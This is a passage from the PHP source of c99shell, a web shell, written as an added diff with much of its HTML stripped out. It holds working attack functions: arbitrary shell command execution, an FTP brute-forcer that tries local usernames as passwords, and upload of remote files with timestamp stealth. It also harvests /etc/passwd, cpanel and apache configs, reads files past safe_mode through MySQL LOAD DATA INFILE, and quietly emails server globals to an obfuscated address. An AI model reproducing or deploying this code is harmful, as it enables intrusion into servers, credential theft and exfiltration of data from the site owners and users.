    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    »
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This functions not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "You can't crack winnt passwords(".$v.")
    ";} + else {echo "You can crack winnt passwords. Download, and use lcp.crack+ ©.
    ";} + } + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
    ";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "View cpanel logs
    ";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/httpd.conf")) {echo "Apache configuration (httpd.conf)
    ";} + if (file_get_contents("/etc/syslog.conf")) {echo "Syslog configuration (syslog.conf)
    ";} + if (file_get_contents("/etc/motd")) {echo "Message Of The Day
    ";} + if (file_get_contents("/etc/hosts")) {echo "Hosts
    ";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "".$name." - ";} echo $name.nl2br($value)."
    ";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "Make File \"".htmlspecialchars($mkfile)."\": object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "Make File \"".htmlspecialchars($mkfile)."\": access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "
    Encoder:
    Input:




    Hashes:
    "; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." -
    "; + } + echo "
    Url:

    urlencode - +
    urldecode - +
    Base64:
    base64_encode -
    "; + echo "
    base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "";} + else {$rows++; echo "";} + echo " ^"; + } + echo "

    Base convertations:
    dec2hex -
    "; +} +if ($act == "fsbuff") +{ + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "
    Buffer is empty!
    ";} + else {echo "File-System buffer

    "; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} +} +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using c99shell v.".$shver."!"; c99shexit(); } + else {echo "
    Can't delete ".__FILE__."!
    ";} + } + else + { + if (!empty($rndcode)) {echo "Error: incorrect confimation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
    Self-remove: ".__FILE__."
    Are you sure?
    For confirmation, enter \"".$rnd."\"
     "; + } +} +if ($act == "update") {$ret = c99sh_getupdate(!!$confirmupdate); echo "".$ret.""; if (stristr($ret,"new version")) {echo "

    ";}} +if ($act == "feedback") +{ + $suppmail = base64_decode("Yzk5c2hlbGxAY2N0ZWFtLnJ1"); + if (!empty($submit)) + { + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = "c99shell v.".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) + { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,"c99shell v.".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
    Thanks for your feedback! Your ticket ID: ".$ticket.".
    "; + } + else {echo "
    Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):

    Your name:

    Your e-mail:

    Message:


    Attach server-info *

    There are no checking in the form.

    * - strongly recommended, if you report bug, because we need it for bug-fix.

    We understand languages: English, Russian.

    ";} +} +if ($act == "search") +{ + echo "Search in file-system:
    "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "
    + +Search for (file/folder name):   - regexp +
    Search in (explode \";\"): +

    Text:
    +

    - regexp +   - whole words only +   - case sensitive +   - find files NOT containing the text +

    "; + if ($act == "ls") {$dspact = $act; echo "
    Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).

    ";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
    ".($err?"Error: ".$err:"")."
    Owner

     Read
     Write
    eXecute
    Group

     Read
     Write
    eXecute
    World

     Read
     Write
    eXecute
    "; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
    ";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "Incorect url!
    ";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!
    ";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!
    ";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "".$uploadmess.""; + $act = "ls"; + } + else + { + echo "File upload:
    ".$uploadmess."
    +Select file on your local computer:
                   or
    +Input URL:

    +Save this file dir:

    +File-name (auto-fill):

    + convert file name to lovercase

    + +
    "; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."
    ";} + } + if (!empty($delerr)) {echo "Deleting with errors:
    ".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "
    Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.
    ";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
    ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
    ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
    ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
    ";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
    ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps -aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + echo "Result of execution this command:
    "; + $olddir = realpath("."); + @chdir($d); + $ret = myshellexec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + @chdir($olddir); + } + else {echo "Execution command"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + else {} + } + if (count($list) == 0) {echo "
    Can't open folder (".htmlspecialchars($d).")!
    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + // Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

